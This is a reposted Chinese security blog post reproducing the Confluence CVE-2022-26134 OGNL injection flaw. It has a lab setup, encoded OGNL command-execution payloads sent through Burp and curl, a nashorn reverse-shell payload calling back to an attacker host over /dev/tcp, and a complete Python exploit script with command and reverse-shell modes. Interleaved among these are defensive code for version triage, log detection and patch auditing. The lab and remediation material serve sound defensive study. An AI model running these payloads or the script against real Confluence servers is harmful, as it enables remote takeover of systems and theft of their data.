Confluence (CVE-2022-26134) OGNL Expression Injection RCE: Vulnerability Reproduction

admin, 2022-06-09 10:07:52

0x00 Vulnerability Overview


Atlassian Confluence is a professional enterprise knowledge-management and collaboration product. It is mainly used by company staff to build knowledge bases and knowledge-management workflows, and it can also serve as an enterprise wiki. It is simple to use, while its powerful editing and site-management features let team members share information, collaborate on documents, hold group discussions and push information to each other. For these reasons it is deployed by many well-known Internet companies in China and is widely used, so this vulnerability has a correspondingly wide impact.


On 2 June 2022 Atlassian published a security advisory for a remote code execution vulnerability. By exploiting it, an attacker can execute arbitrary commands in Confluence without any preconditions and directly take over the target system.


CVE ID: CVE-2022-26134

Severity: Critical



0x01 Affected Versions

1. Affected versions:

Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1


2. Fixed versions:

Confluence Server and Data Center 7.4.17
Confluence Server and Data Center 7.13.7
Confluence Server and Data Center 7.14.3
Confluence Server and Data Center 7.15.2
Confluence Server and Data Center 7.16.4
Confluence Server and Data Center 7.17.4
Confluence Server and Data Center 7.18.1
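As an added example (not part of the original post, and not the exploit script shown later), the following Python encodes the affected and fixed ranges above so an inventory of Confluence versions can be classified without touching the instances. It goes slightly beyond the list: maintenance branches that received no fix (7.5.x up to 7.12.x, for instance) are treated as vulnerable at every patch level, and anything from 7.18.1 upwards as fixed. The version is read from the `footer-build-information` span that the post's own script also parses; the HTML fragment in the block is constructed, not captured from a real instance.

```python
import re

# Affected range and per-branch fixed releases, as listed in the advisory above.
FIRST_AFFECTED = (1, 3, 0)
FIRST_FIXED_LINE = (7, 18, 1)          # 7.18.1 and everything newer carries the fix
FIXED_PER_BRANCH = {                   # (major, minor) -> first fixed patch level
    (7, 4): 17,
    (7, 13): 7,
    (7, 14): 3,
    (7, 15): 2,
    (7, 16): 4,
    (7, 17): 4,
    (7, 18): 1,
}

FOOTER_RE = re.compile(r"<span id='footer-build-information'>\s*([^<]+?)\s*</span>")


def parse_version(text):
    """Turn '7.13.6' (any trailing qualifier is ignored) into a (major, minor, patch) tuple."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError("not a Confluence version string: %r" % (text,))
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_vulnerable(version):
    """True if a Confluence Server/Data Center version falls in the CVE-2022-26134 range."""
    v = parse_version(version)
    if v < FIRST_AFFECTED or v >= FIRST_FIXED_LINE:
        return False
    fixed_patch = FIXED_PER_BRANCH.get(v[:2])
    # Branches with no fixed release (for example 7.5.x) stay vulnerable at every patch level.
    if fixed_patch is not None and v[2] >= fixed_patch:
        return False
    return True


def version_from_footer(html):
    """Extract the version from the footer span of the login page (same span the post's script reads)."""
    m = FOOTER_RE.search(html)
    return m.group(1) if m else None


# Constructed login-page fragment, not captured from a real instance.
SAMPLE_LOGIN_HTML = """
<div id="footer"><span id='footer-build-information'>7.13.6</span></div>
"""

if __name__ == "__main__":
    v = version_from_footer(SAMPLE_LOGIN_HTML)
    print(v, "vulnerable" if is_vulnerable(v) else "fixed")
```

Feed `version_from_footer` the body of `/login.action` (or the version from your CMDB) and `is_vulnerable` gives a yes/no per host, which is a quicker triage than sending a probe request to each instance.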



0x02 Setting Up the Vulnerable Environment

Lab environment:

OS: CentOS 7 (192.168.110.135)

Target range: vulhub-master


Starting the environment:

1. cd /vulhub-master/confluence/CVE-2022-26134

2. docker-compose up -d

3. Once the environment is up, browse to http://your-ip:8090. The setup wizard starts and then asks for a license key. Click "Get an evaluation license" and request a Confluence Server trial license from Atlassian:




4. Enter an email address; a confirmation email is sent, then complete the registration as prompted




5. After registering, obtain the key




6. With the key in hand, enter it on the http://your-ip:8090 page




7. The wizard moves on to the database settings page. The PostgreSQL host is db, the database name is confluence, and the username and password are both postgres




Here I set the username to admin and the password to passwd




8. Setup is complete and the login page appears





0x03 Vulnerability Reproduction

1. Capturing and testing the request with Burp Suite


The OGNL expression used is:

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

After URL encoding, the GET request is built as follows:

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: 192.168.110.135:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=36741E46B989F771E76C799AD46E8BC2
Connection: close


Send the request and arbitrary commands execute with their output echoed back (RCE with output); the command output is returned in the X-Cmd-Response response header




2. Testing with curl


curl -v http://192.168.110.135:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
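The two checks above both send the OGNL expression percent-encoded in the request path, which is exactly what shows up in the web server's access log. As an added detection example (my own code, not from the original post), the following Python scans access-log lines in the Tomcat/Apache common format, URL-decodes the path (twice, so a double-encoded path is unwrapped as well) and flags the OGNL constructs visible in the requests above: the `${` wrapper, `@class@member` static access and `#var=` assignment. The log lines in the block are constructed; the function and label names are mine.

```python
import re
from urllib.parse import unquote

# Tomcat / Apache "common" access-log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# OGNL constructs that do not occur in legitimate Confluence URLs, checked on the decoded path.
OGNL_MARKERS = [
    ("ognl-expression", re.compile(r"\$\{")),                   # ${ ... } expression wrapper
    ("static-member-access", re.compile(r"@[\w.]+@\w+")),       # @java.lang.Runtime@getRuntime
    ("variable-assignment", re.compile(r"#[A-Za-z_]\w*\s*=")),  # #a= ...
]


def decode_path(path, rounds=2):
    """URL-decode repeatedly (bounded) so double-encoded payloads are unwrapped too."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def inspect_line(line):
    """Return a finding dict for a suspicious request line, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode_path(m.group("path"))
    markers = [label for label, rx in OGNL_MARKERS if rx.search(path)]
    if not markers:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "status": m.group("status"),
        "path": path,
        "markers": markers,
    }


def scan(lines):
    """Run inspect_line over an iterable of log lines and keep only the hits."""
    return [f for f in (inspect_line(l) for l in lines) if f is not None]


# Constructed sample log: a normal login, a single-encoded probe like the curl command
# in the post, a double-encoded probe, and a normal page view.
SAMPLE_LOG = [
    '192.168.110.128 - - [09/Jun/2022:10:07:52 +0800] "GET /login.action HTTP/1.1" 200 5123',
    '192.168.110.128 - - [09/Jun/2022:10:12:01 +0800] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 302 0',
    '10.0.0.7 - - [09/Jun/2022:10:15:33 +0800] "GET /%2524%257B%2523x%253D1%257D/ HTTP/1.1" 302 0',
    '10.0.0.9 - - [09/Jun/2022:10:16:10 +0800] "GET /display/DOC/Home?src=sidebar HTTP/1.1" 200 8831',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["time"], finding["ip"], finding["status"], finding["markers"])
```

A 302 with one of these markers in the path is the signature of the probe shown in this section; because the command output travels back in the X-Cmd-Response header, a reverse proxy that logs response headers gives a second place to confirm a successful hit.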





0x04 GetShell

Kali IP: 192.168.110.128

Payload:

${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/192.168.110.128/6666 0>&1').start()")}


1. Start a listener on Kali, listening on port 6666




2. Trigger the reverse shell with the exploit; the shell comes back and GetShell succeeds





0x05 Exploit (EXP)

1. Arbitrary command execution

python3 CVE-2022-26134exp.py [-u url] [-c command]




2. Detailed usage parameters and source code of the exploit




#!/usr/bin/python3
# coding: utf-8
# cve2022-26134
# by: lxxl
import argparse
import re
import sys
import urllib.parse

import requests
import urllib3

urllib3.disable_warnings()


def check(url):
    # Read the version from the footer-build-information span on the login page
    r = requests.get(url + "/login.action", verify=False)
    if r.status_code == 200:
        filter_version = re.findall("<span id='footer-build-information'>.*</span>", r.text)
        if len(filter_version) >= 1:
            version = filter_version[0].split("'>")[1].split('</')[0]
            return version
        return False
    return False


def exploit(url, command):
    # The command output comes back in the X-Cmd-Response header of the 302 reply
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': '*/*',
    }
    r = requests.get(
        url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22' + command + '%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/',
        headers=headers, verify=False, allow_redirects=False)
    if r.status_code == 302:
        return r.headers.get('X-Cmd-Response', False)
    return False


def shell(ip, port):
    # Build the URL-encoded nashorn reverse-shell payload from section 0x04
    shell = ip + "/" + port
    shell1 = "'bash','-c','bash -i >& "
    exp = shell1 + "/dev/tcp/" + shell + " 0>&1'"
    payload1 = '''${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('''
    payload2 = exp + ''').start()")}/'''
    payloads = payload1 + payload2
    return urllib.parse.quote(payloads)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='cve2022-26134')
    parser.add_argument('-u', '--url', help='target url', required=False)
    parser.add_argument('-c', '--command', help='command', required=False)
    parser.add_argument('-i', '--lhost', help='listener ip', required=False)
    parser.add_argument('-p', '--lport', help='listener port', required=False)
    args = parser.parse_args()
    cmd = args.command
    ip = args.lhost
    port = args.lport

    # Either -c (command mode) or -i and -p (reverse-shell mode) is needed besides -u
    if not args.url or not (cmd or (ip and port)):
        print("USE: python3 " + sys.argv[0] + " -u https://target.com -c command")
        print("ex: python3 " + sys.argv[0] + " -u https://target.com -i your.ip -p your.port")
        sys.exit(1)

    target = args.url
    if ip and port:
        # Reverse-shell mode
        e = requests.get(target + "/" + shell(ip, port))
        if e.status_code == 200 or e.status_code == 302:
            print("[+] exploit success")
        else:
            print("[-] exploit failed")
    else:
        # Command-execution mode: fetch the version first, then run the command
        cmd = cmd.replace("'", "")
        version = check(target)
        print("============ GET Confluence Version ============")
        if version:
            print("Version: " + version)
        else:
            print("Version: Not Found")
        print(exploit(target, cmd))



0x06 Remediation

1. Upgrade Atlassian Confluence Server and Data Center to a fixed version

2. Temporary mitigation:

Download the officially released xwork-1.0.3-atlassian-10.jar, replace the existing xwork jar under confluence/WEB-INF/lib/ with it, and restart Confluence

Download link:

https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar
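The mitigation above hinges on one detail: the old xwork jar has to be replaced, not merely joined by the new one, or the old classes may still be picked up from the classpath. As an added example (my own code, not Atlassian's or the post's), the Python below lists the xwork jars in a WEB-INF/lib directory and reports whether the directory is patched, unpatched, or in the mixed state where both jars are present. It assumes the naming pattern `xwork-<version>[-atlassian-<build>].jar` and that builds later than atlassian-10 keep the fix; the stale file names in the assertions are constructed.

```python
import os
import re
import sys

PATCHED_BUILD = 10   # xwork-1.0.3-atlassian-10.jar is the jar Atlassian published for this mitigation

# Assumed naming pattern for the xwork jar under WEB-INF/lib: xwork-<version>[-atlassian-<build>].jar
XWORK_JAR_RE = re.compile(r"^xwork-(?P<ver>\d+(?:\.\d+)*)(?:-atlassian-(?P<build>\d+))?\.jar$")


def classify_xwork_jars(filenames):
    """Sort the xwork jars among the given file names into patched and stale, and summarise."""
    patched, stale = [], []
    for name in filenames:
        m = XWORK_JAR_RE.match(name)
        if not m:
            continue  # not an xwork jar
        build = int(m.group("build") or 0)
        # Assumption: 1.0.3-atlassian-10 and any later atlassian build carry the fix
        if m.group("ver") == "1.0.3" and build >= PATCHED_BUILD:
            patched.append(name)
        else:
            stale.append(name)
    if patched and not stale:
        status = "patched"
    elif patched and stale:
        status = "mixed"         # old jar left next to the new one: still on the classpath
    elif stale:
        status = "unpatched"
    else:
        status = "no-xwork-jar"  # wrong directory, or a layout this check does not know
    return {"status": status, "patched": sorted(patched), "stale": sorted(stale)}


def audit_lib_dir(lib_dir):
    """Run the classification over a real confluence/WEB-INF/lib directory."""
    return classify_xwork_jars(os.listdir(lib_dir))


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: %s <path-to-confluence/WEB-INF/lib>" % sys.argv[0])
        sys.exit(1)
    print(audit_lib_dir(sys.argv[1]))
```

Run it against the lib directory after the swap and again after the restart; anything other than `patched` means the temporary mitigation is not actually in effect.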



This content is for learning and for checking and fixing your own systems only; any consequences arising from this article are the sole responsibility of the individual user.





Originally published on the WeChat public account 米瑞尔信息安全 under the title "Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现".

Posted by admin on 2022-06-09 10:07:52. Reposted by CN-SEC; when reposting, keep the article link: http://cn-sec.com/archives/1099861.html
